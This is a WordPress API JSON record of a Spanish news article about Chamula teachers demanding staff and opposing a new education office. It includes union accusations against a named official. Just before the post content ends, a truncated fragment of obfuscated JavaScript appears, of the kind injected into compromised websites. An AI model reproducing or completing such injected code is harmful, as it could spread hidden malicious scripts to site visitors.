{"id":18089,"date":"2024-09-28T04:33:17","date_gmt":"2024-09-28T04:33:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18089"},"modified":"2024-09-28T04:33:18","modified_gmt":"2024-09-28T04:33:18","slug":"piden-solucionar-conflicto-educativo-en-chamula","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18089","title":{"rendered":"Piden solucionar conflicto educativo en Chamula"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"665\" height=\"500\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727497920094.jpg\" alt=\"\" class=\"wp-image-18090\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727497920094.jpg 665w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1727497920094-300x226.jpg 300w\" sizes=\"auto, (max-width: 665px) 100vw, 665px\" \/><\/figure>\n\n\n\n<p>Carlos Luna.<\/p>\n\n\n\n<p>Por la falta de maestros y el intento por crear una nueva jefatura en el municipio de San Juan Chamula, gener\u00f3 el descontento del magisterio del Nivel de Educaci\u00f3n Ind\u00edgena (NEI), de la Coordinadora Regional de los Altos de Chiapas (CRACH), de la Secci\u00f3n 7 del Sindicato Nacional de Trabajadores de la Educaci\u00f3n (SNTE), exigen intervenci\u00f3n de las autoridades.<\/p>\n\n\n\n<p>Una comitiva de 30 personas ser\u00eda atendida por los representantes del gobierno estatal, y el subsecretario Jorge Cruz Pineda; el pliego petitorio consiste en dos puntos, atender la faltante de los recursos humanos en las escuelas de la regi\u00f3n y frenar la nueva jefatura de educaci\u00f3n en la cabecera municipal de Chamula.<\/p>\n\n\n\n<p>Juan P\u00e9rez L\u00f3pez, Coordinador Regional de los Altos, declar\u00f3 que: \u201cen ocultas los operadores pol\u00edticos neocharros\u201d sin los que plantean en un proyecto esta divisi\u00f3n, encabezada por \u201cel charro, Rafael Entz\u00edn\u201d.<\/p>\n\n\n\n<p>Persona que subray\u00f3 tiene diversos malos antecedentes con los maestros, por actos de corrupci\u00f3n, maltrato a los docentes, e incluso acoso sexual contra maestras<\/p>\n\n\n\n<p>\u201cViene maltratando a nuestros compa\u00f1eros maestros y maestras. Lo decimos p\u00fablico; cuando gestiona a alg\u00fan interino despu\u00e9s les cobra su comisi\u00f3n\u2026 demandamos en aquel tiempo, e hicieron caso omiso, el acoso sexual a una compa\u00f1era; no permitimos que esta persona haga la divisi\u00f3n y siga haciendo su trabajo o operativo pol\u00edtico, corrupto y traicionero; en nuestra regi\u00f3n no tiene cavidad\u201d, declar\u00f3 y sostuvo son m\u00e1s de dos mil maestros apoyan no se divida la regi\u00f3n.<\/p>\n\n\n\n<p>El dirigente sindical extern\u00f3 que \u201cla exigencia m\u00e1s sentida de todo el pueblo ind\u00edgena\u201d es la falta de maestros, espec\u00edficamente en los niveles de preescolar y primaria, a pesar de haber contrataciones por parte de interinos en los centros de trabajo, muchas escuelas no han comenzado las clases, lo que implica \u201cviolaciones de derechos humanos\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Carlos Luna. Por la falta de maestros y el intento por crear una nueva jefatura en el municipio de San Juan Chamula, gener\u00f3 el descontento del magisterio del Nivel de Educaci\u00f3n Ind\u00edgena (NEI), de la Coordinadora Regional de los Altos de Chiapas (CRACH), de la Secci\u00f3n 7 del Sindicato Nacional de Trabajadores de la Educaci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18090,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-18089","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18089","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18089"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18089\/revisions"}],"predecessor-version":[{"id":18091,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18089\/revisions\/18091"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18090"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18089"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18089"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18089"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}